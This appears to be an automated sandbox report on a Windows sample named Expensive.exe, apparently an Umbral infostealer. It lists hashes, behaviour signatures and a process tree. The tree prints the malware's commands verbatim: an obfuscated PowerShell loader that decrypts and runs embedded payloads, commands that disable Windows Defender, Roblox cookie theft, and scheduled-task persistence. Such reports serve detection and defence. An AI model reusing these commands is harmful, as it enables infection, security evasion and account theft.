Analysis
max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 26-05-2024 16:13
Static task: static1
Behavioral task: behavioral1 (Sample: Expensive.exe, Resource: win7-20240508-en)
Behavioral task: behavioral2 (Sample: Expensive.exe, Resource: win10v2004-20240508-en)

General
Target: Expensive.exe
Size: 599KB
MD5: 65e4c0420f496abb02201df254eb87a1
SHA1: 6efcf4be11132a32a3df5029c87d2daa466fcc1a
SHA256: 3684b6d86d9928b8dfef807c55d5de421b6325c0cb28991037d26703598d1e44
SHA512: bedb40ae7f3a6c1a2cc7e62069025d87b5383526e414df9825ad50bf8516077574134fe25ff285f0754d2bee608ba619ee56a33d4e9ddb6a997dab4d5635f6bb
SSDEEP: 12288:jeHrZIhqCgsKF/kFnBf5rkb2LAW/4Mon2rcATuNpGRhb5vUMfyU1/:jsFQqS0kR9aCkW/4t2r9upGmM6U1

Malware Config
Signatures
Detect Umbral payload (2 IoCs)
resource | yara_rule
behavioral2/files/0x0004000000022978-64.dat | family_umbral
behavioral2/memory/1772-71-0x00000266F5C70000-0x00000266F5CB0000-memory.dmp | family_umbral

Modifies WinLogon for persistence (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Windows\\Sub\\Client.exe" | Client.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 4 IoCs)
Run Powershell and hide display window.
pid | Process
4900 | powershell.exe
2880 | powershell.exe
4856 | powershell.exe
4428 | powershell.exe

Drops file in Drivers directory (1 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\drivers\etc\hosts | Umbral.exe

Modifies AppInit DLL entries (2 TTPs)

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | Expensive.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | WScript.exe

Executes dropped EXE (3 IoCs)
pid | Process
3828 | ExpensiveLauncher.exe
1772 | Umbral.exe
3652 | Client.exe

Loads dropped DLL (40 IoCs)
pid Process:
2784 Process not Found; 4344 Process not Found; 1496 Process not Found; 1360 Process not Found; 4436 Process not Found; 2324 Process not Found; 676 Process not Found; 2628 Process not Found;
4488 Process not Found; 4892 Process not Found; 3964 Process not Found; 4944 Process not Found; 2216 Process not Found; 1640 Process not Found; 760 Process not Found; 1508 Process not Found;
2740 Process not Found; 2616 Process not Found; 3176 Process not Found; 4544 Process not Found; 4884 Process not Found; 4552 Process not Found; 3628 Process not Found; 3352 Process not Found;
1112 Process not Found; 3316 Process not Found; 1612 Process not Found; 4464 Process not Found; 4396 Process not Found; 756 Process not Found; 1368 Process not Found; 2576 Process not Found;
4020 Process not Found; 3100 Process not Found; 4176 Process not Found; 4812 Process not Found; 1512 Process not Found; 1640 Process not Found; 2532 Process not Found; 3780 Process not Found

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Windows\\Sub\\WatchDog.exe" | Client.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow | ioc
36 | discord.com
37 | discord.com

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
28 | ip-api.com

Drops file in Windows directory (6 IoCs)
description | ioc | Process
File created | C:\Windows\Sub\Client.exe | Client.exe
File opened for modification | C:\Windows\Sub\Client.exe | Client.exe
File opened for modification | C:\Windows\Sub | Client.exe
File created | C:\Windows\Sub\WatchDog.exe | Client.exe
File opened for modification | C:\Windows\Sub\WatchDog.exe | Client.exe
File created | C:\Windows\xdwd.dll | Client.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 40 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process:
752 schtasks.exe; 4968 schtasks.exe; 1400 schtasks.exe; 4416 schtasks.exe; 2076 schtasks.exe; 1068 schtasks.exe; 2412 schtasks.exe; 1508 schtasks.exe;
4412 schtasks.exe; 3204 schtasks.exe; 3316 schtasks.exe; 2628 schtasks.exe; 2232 schtasks.exe; 3356 schtasks.exe; 612 schtasks.exe; 1704 schtasks.exe;
4084 schtasks.exe; 4400 schtasks.exe; 4416 schtasks.exe; 3356 schtasks.exe; 4680 schtasks.exe; 3612 schtasks.exe; 2480 schtasks.exe; 3968 schtasks.exe;
3696 schtasks.exe; 4412 schtasks.exe; 2536 schtasks.exe; 1584 schtasks.exe; 212 schtasks.exe; 3932 schtasks.exe; 4344 schtasks.exe; 1836 schtasks.exe;
2704 schtasks.exe; 116 schtasks.exe; 3528 schtasks.exe; 1112 schtasks.exe; 4656 schtasks.exe; 3184 schtasks.exe; 4084 schtasks.exe; 3964 schtasks.exe

Detects videocard installed (1 TTPs, 1 IoCs)
Uses WMIC.exe to determine videocard installed.
pid | Process
1928 | wmic.exe

Modifies registry class (10 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\ = "URL:Run game 1199748644409184347 protocol" | ExpensiveLauncher.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\URL Protocol | ExpensiveLauncher.exe
Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\shell | ExpensiveLauncher.exe
Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\shell\open | ExpensiveLauncher.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ExpensiveLauncher.exe" | ExpensiveLauncher.exe
Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | powershell.exe
Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347 | ExpensiveLauncher.exe
Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\DefaultIcon | ExpensiveLauncher.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ExpensiveLauncher.exe" | ExpensiveLauncher.exe
Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\shell\open\command | ExpensiveLauncher.exe

Runs net.exe

Runs ping.exe (1 TTPs, 1 IoCs)
pid | Process
5068 | PING.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid Process:
4856 powershell.exe; 4856 powershell.exe; 4900 powershell.exe; 4900 powershell.exe; 4900 powershell.exe; 4428 powershell.exe; 4428 powershell.exe; 1772 Umbral.exe;
2880 powershell.exe; 2880 powershell.exe; 2880 powershell.exe; 1452 powershell.exe; 1452 powershell.exe; 1452 powershell.exe; 4596 powershell.exe; 4596 powershell.exe;
4596 powershell.exe; 1068 powershell.exe; 1068 powershell.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe;
3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe;
3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe;
3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe;
3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe;
3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe; 3652 Client.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4856 | powershell.exe
Token: SeDebugPrivilege | 4900 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 4900 | powershell.exe
Token: SeSecurityPrivilege | 4900 | powershell.exe
Token: SeTakeOwnershipPrivilege | 4900 | powershell.exe
Token: SeLoadDriverPrivilege | 4900 | powershell.exe
Token: SeSystemProfilePrivilege | 4900 | powershell.exe
Token: SeSystemtimePrivilege | 4900 | powershell.exe
Token: SeProfSingleProcessPrivilege | 4900 | powershell.exe
Token: SeIncBasePriorityPrivilege | 4900 | powershell.exe
Token: SeCreatePagefilePrivilege | 4900 | powershell.exe
Token: SeBackupPrivilege | 4900 | powershell.exe
Token: SeRestorePrivilege | 4900 | powershell.exe
Token: SeShutdownPrivilege | 4900 | powershell.exe
Token: SeDebugPrivilege | 4900 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 4900 | powershell.exe
Token: SeRemoteShutdownPrivilege | 4900 | powershell.exe
Token: SeUndockPrivilege | 4900 | powershell.exe
Token: SeManageVolumePrivilege | 4900 | powershell.exe
Token: 33 | 4900 | powershell.exe
Token: 34 | 4900 | powershell.exe
Token: 35 | 4900 | powershell.exe
Token: 36 | 4900 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 4900 | powershell.exe
Token: SeSecurityPrivilege | 4900 | powershell.exe
Token: SeTakeOwnershipPrivilege | 4900 | powershell.exe
Token: SeLoadDriverPrivilege | 4900 | powershell.exe
Token: SeSystemProfilePrivilege | 4900 | powershell.exe
Token: SeSystemtimePrivilege | 4900 | powershell.exe
Token: SeProfSingleProcessPrivilege | 4900 | powershell.exe
Token: SeIncBasePriorityPrivilege | 4900 | powershell.exe
Token: SeCreatePagefilePrivilege | 4900 | powershell.exe
Token: SeBackupPrivilege | 4900 | powershell.exe
Token: SeRestorePrivilege | 4900 | powershell.exe
Token: SeShutdownPrivilege | 4900 | powershell.exe
Token: SeDebugPrivilege | 4900 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 4900 | powershell.exe
Token: SeRemoteShutdownPrivilege | 4900 | powershell.exe
Token: SeUndockPrivilege | 4900 | powershell.exe
Token: SeManageVolumePrivilege | 4900 | powershell.exe
Token: 33 | 4900 | powershell.exe
Token: 34 | 4900 | powershell.exe
Token: 35 | 4900 | powershell.exe
Token: 36 | 4900 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 4900 | powershell.exe
Token: SeSecurityPrivilege | 4900 | powershell.exe
Token: SeTakeOwnershipPrivilege | 4900 | powershell.exe
Token: SeLoadDriverPrivilege | 4900 | powershell.exe
Token: SeSystemProfilePrivilege | 4900 | powershell.exe
Token: SeSystemtimePrivilege | 4900 | powershell.exe
Token: SeProfSingleProcessPrivilege | 4900 | powershell.exe
Token: SeIncBasePriorityPrivilege | 4900 | powershell.exe
Token: SeCreatePagefilePrivilege | 4900 | powershell.exe
Token: SeBackupPrivilege | 4900 | powershell.exe
Token: SeRestorePrivilege | 4900 | powershell.exe
Token: SeShutdownPrivilege | 4900 | powershell.exe
Token: SeDebugPrivilege | 4900 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 4900 | powershell.exe
Token: SeRemoteShutdownPrivilege | 4900 | powershell.exe
Token: SeUndockPrivilege | 4900 | powershell.exe
Token: SeManageVolumePrivilege | 4900 | powershell.exe
Token: 33 | 4900 | powershell.exe
Token: 34 | 4900 | powershell.exe
Token: 35 | 4900 | powershell.exe

Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 3100 wrote to memory of 3828 | 3100 | Expensive.exe | 86
PID 3100 wrote to memory of 3828 | 3100 | Expensive.exe | 86
PID 3100 wrote to memory of 5076 | 3100 | Expensive.exe | 88
PID 3100 wrote to memory of 5076 | 3100 | Expensive.exe | 88
PID 3828 wrote to memory of 2396 | 3828 | ExpensiveLauncher.exe | 90
PID 3828 wrote to memory of 2396 | 3828 | ExpensiveLauncher.exe | 90
PID 5076 wrote to memory of 1820 | 5076 | cmd.exe | 91
PID 5076 wrote to memory of 1820 | 5076 | cmd.exe | 91
PID 1820 wrote to memory of 1512 | 1820 | net.exe | 92
PID 1820 wrote to memory of 1512 | 1820 | net.exe | 92
PID 5076 wrote to memory of 4856 | 5076 | cmd.exe | 96
PID 5076 wrote to memory of 4856 | 5076 | cmd.exe | 96
PID 4856 wrote to memory of 4900 | 4856 | powershell.exe | 100
PID 4856 wrote to memory of 4900 | 4856 | powershell.exe | 100
PID 4856 wrote to memory of 820 | 4856 | powershell.exe | 102
PID 4856 wrote to memory of 820 | 4856 | powershell.exe | 102
PID 820 wrote to memory of 4796 | 820 | WScript.exe | 103
PID 820 wrote to memory of 4796 | 820 | WScript.exe | 103
PID 4796 wrote to memory of 1400 | 4796 | cmd.exe | 105
PID 4796 wrote to memory of 1400 | 4796 | cmd.exe | 105
PID 1400 wrote to memory of 3608 | 1400 | net.exe | 106
PID 1400 wrote to memory of 3608 | 1400 | net.exe | 106
PID 4796 wrote to memory of 4428 | 4796 | cmd.exe | 107
PID 4796 wrote to memory of 4428 | 4796 | cmd.exe | 107
PID 4428 wrote to memory of 1772 | 4428 | powershell.exe | 109
PID 4428 wrote to memory of 1772 | 4428 | powershell.exe | 109
PID 4428 wrote to memory of 3652 | 4428 | powershell.exe | 110
PID 4428 wrote to memory of 3652 | 4428 | powershell.exe | 110
PID 1772 wrote to memory of 4120 | 1772 | Umbral.exe | 113
PID 1772 wrote to memory of 4120 | 1772 | Umbral.exe | 113
PID 1772 wrote to memory of 1928 | 1772 | Umbral.exe | 115
PID 1772 wrote to memory of 1928 | 1772 | Umbral.exe | 115
PID 1772 wrote to memory of 2880 | 1772 | Umbral.exe | 117
PID 1772 wrote to memory of 2880 | 1772 | Umbral.exe | 117
PID 1772 wrote to memory of 3612 | 1772 | Umbral.exe | 119
PID 1772 wrote to memory of 3612 | 1772 | Umbral.exe | 119
PID 1772 wrote to memory of 1452 | 1772 | Umbral.exe | 121
PID 1772 wrote to memory of 1452 | 1772 | Umbral.exe | 121
PID 1772 wrote to memory of 4596 | 1772 | Umbral.exe | 123
PID 1772 wrote to memory of 4596 | 1772 | Umbral.exe | 123
PID 1772 wrote to memory of 2108 | 1772 | Umbral.exe | 125
PID 1772 wrote to memory of 2108 | 1772 | Umbral.exe | 125
PID 1772 wrote to memory of 1508 | 1772 | Umbral.exe | 127
PID 1772 wrote to memory of 1508 | 1772 | Umbral.exe | 127
PID 1772 wrote to memory of 2148 | 1772 | Umbral.exe | 129
PID 1772 wrote to memory of 2148 | 1772 | Umbral.exe | 129
PID 1772 wrote to memory of 1068 | 1772 | Umbral.exe | 131
PID 1772 wrote to memory of 1068 | 1772 | Umbral.exe | 131
PID 1772 wrote to memory of 1928 | 1772 | Umbral.exe | 133
PID 1772 wrote to memory of 1928 | 1772 | Umbral.exe | 133
PID 1772 wrote to memory of 4612 | 1772 | Umbral.exe | 135
PID 1772 wrote to memory of 4612 | 1772 | Umbral.exe | 135
PID 4612 wrote to memory of 5068 | 4612 | cmd.exe | 137
PID 4612 wrote to memory of 5068 | 4612 | cmd.exe | 137
PID 3652 wrote to memory of 1712 | 3652 | Client.exe | 138
PID 3652 wrote to memory of 1712 | 3652 | Client.exe | 138
PID 1712 wrote to memory of 3612 | 1712 | CMD.exe | 140
PID 1712 wrote to memory of 3612 | 1712 | CMD.exe | 140
PID 3652 wrote to memory of 4696 | 3652 | Client.exe | 141
PID 3652 wrote to memory of 4696 | 3652 | Client.exe | 141
PID 4696 wrote to memory of 2480 | 4696 | CMD.exe | 143
PID 4696 wrote to memory of 2480 | 4696 | CMD.exe | 143
PID 3652 wrote to memory of 4544 | 3652 | Client.exe | 144
PID 3652 wrote to memory of 4544 | 3652 | Client.exe | 144

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes (1 TTPs, 1 IoCs)
pid | Process
1928 | attrib.exe

Processes
[depth 1] C:\Users\Admin\AppData\Local\Temp\Expensive.exe (PID 3100)
  command line: "C:\Users\Admin\AppData\Local\Temp\Expensive.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe (PID 3828)
    command line: "C:\Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe"
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\system32\cmd.exe (PID 2396)
      command line: C:\Windows\system32\cmd.exe /c cls
  [depth 2] C:\Windows\system32\cmd.exe (PID 5076)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Expensive.bat" "
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\system32\net.exe (PID 1820)
      command line: net file
      - Suspicious use of WriteProcessMemory
      [depth 4] C:\Windows\system32\net1.exe (PID 1512)
        command line: C:\Windows\system32\net1 file
    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4856)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zlo9ncEYo3QUkLbnvPRah2udZSQFyEkFClqBW6M5QLg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KvNrQpenzWsPMRFAkt8PNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dWnBZ=New-Object System.IO.MemoryStream(,$param_var); $fgVcf=New-Object System.IO.MemoryStream; $AcYrR=New-Object System.IO.Compression.GZipStream($dWnBZ, [IO.Compression.CompressionMode]::Decompress); $AcYrR.CopyTo($fgVcf); $AcYrR.Dispose(); $dWnBZ.Dispose(); $fgVcf.Dispose(); $fgVcf.ToArray();}function execute_function($param_var,$param2_var){ $MnaPb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KIsjD=$MnaPb.EntryPoint; $KIsjD.Invoke($null, $param2_var);}$UgcxC = 'C:\Users\Admin\AppData\Local\Temp\Expensive.bat';$host.UI.RawUI.WindowTitle = $UgcxC;$RYiHp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UgcxC).Split([Environment]::NewLine);foreach ($AWVRD in $RYiHp) { if ($AWVRD.StartsWith(':: ')) { $qeYnm=$AWVRD.Substring(3); break; }}$payloads_var=[string[]]$qeYnm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      - Command and Scripting Interpreter: PowerShell
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4900)
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_451_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_451.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      [depth 4] C:\Windows\System32\WScript.exe (PID 820)
        command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_451.vbs"
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
        [depth 5] C:\Windows\system32\cmd.exe (PID 4796)
          command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_451.bat" "
          - Suspicious use of WriteProcessMemory
          [depth 6] C:\Windows\system32\net.exe (PID 1400)
            command line: net file
            - Suspicious use of WriteProcessMemory
            [depth 7] C:\Windows\system32\net1.exe (PID 3608)
              command line: C:\Windows\system32\net1 file
          [depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4428)
            command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zlo9ncEYo3QUkLbnvPRah2udZSQFyEkFClqBW6M5QLg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KvNrQpenzWsPMRFAkt8PNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dWnBZ=New-Object System.IO.MemoryStream(,$param_var); $fgVcf=New-Object System.IO.MemoryStream; $AcYrR=New-Object System.IO.Compression.GZipStream($dWnBZ, [IO.Compression.CompressionMode]::Decompress); $AcYrR.CopyTo($fgVcf); $AcYrR.Dispose(); $dWnBZ.Dispose(); $fgVcf.Dispose(); $fgVcf.ToArray();}function execute_function($param_var,$param2_var){ $MnaPb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KIsjD=$MnaPb.EntryPoint; $KIsjD.Invoke($null, $param2_var);}$UgcxC = 'C:\Users\Admin\AppData\Roaming\startup_str_451.bat';$host.UI.RawUI.WindowTitle = $UgcxC;$RYiHp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UgcxC).Split([Environment]::NewLine);foreach ($AWVRD in $RYiHp) { if ($AWVRD.StartsWith(':: ')) { $qeYnm=$AWVRD.Substring(3); break; }}$payloads_var=[string[]]$qeYnm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory
            [depth 7] C:\Users\Admin\AppData\Local\Temp\Umbral.exe (PID 1772)
              command line: "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
              - Drops file in Drivers directory
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of WriteProcessMemory
              [depth 8] C:\Windows\System32\Wbem\wmic.exe (PID 4120)
                command line: "wmic.exe" csproduct get uuid
              [depth 8] C:\Windows\SYSTEM32\attrib.exe (PID 1928)
                command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                - Views/modifies file attributes
              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2880)
                command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3612)
                command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1452)
                command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                - Suspicious behavior: EnumeratesProcesses
              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4596)
                command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                - Suspicious behavior: EnumeratesProcesses
              [depth 8] C:\Windows\System32\Wbem\wmic.exe (PID 2108)
                command line: "wmic.exe" os get Caption
              [depth 8] C:\Windows\System32\Wbem\wmic.exe (PID 1508)
                command line: "wmic.exe" computersystem get totalphysicalmemory
              [depth 8] C:\Windows\System32\Wbem\wmic.exe (PID 2148)
                command line: "wmic.exe" csproduct get uuid
              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1068)
                command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                - Suspicious behavior: EnumeratesProcesses
              [depth 8] C:\Windows\System32\Wbem\wmic.exe (PID 1928)
                command line: "wmic" path win32_VideoController get name
                - Detects videocard installed
              [depth 8] C:\Windows\SYSTEM32\cmd.exe (PID 4612)
                command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
                - Suspicious use of WriteProcessMemory
                [depth 9] C:\Windows\system32\PING.EXE (PID 5068)
                  command line: ping localhost
                  - Runs ping.exe
            [depth 7] C:\Users\Admin\AppData\Local\Temp\Client.exe (PID 3652)
              command line: "C:\Users\Admin\AppData\Local\Temp\Client.exe"
              - Modifies WinLogon for persistence
              - Executes dropped EXE
              - Adds Run key to start application
              - Drops file in Windows directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of WriteProcessMemory
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 1712)
                command line: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "AssemblyBroker" /tr "C:\Windows\Sub\Client.exe" & exit
                - Suspicious use of WriteProcessMemory
                [depth 9] C:\Windows\system32\schtasks.exe (PID 3612)
                  command line: SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "AssemblyBroker" /tr "C:\Windows\Sub\Client.exe"
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 4696)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                - Suspicious use of WriteProcessMemory
                [depth 9] C:\Windows\system32\schtasks.exe (PID 2480)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 4544)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Svhost" /tr "C:\Windows\Sub\WatchDog.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 2628)
                  command line: SchTaSKs /create /f /sc minute /mo 5 /tn "Svhost" /tr "C:\Windows\Sub\WatchDog.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 4680)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 3968)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 3988)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
                [depth 9] C:\Windows\system32\schtasks.exe (PID 3696)
                  command line: SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
                  - Creates scheduled task(s)
              [depth 8] C:\Windows\SYSTEM32\CMD.exe (PID 2664)
                command line: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
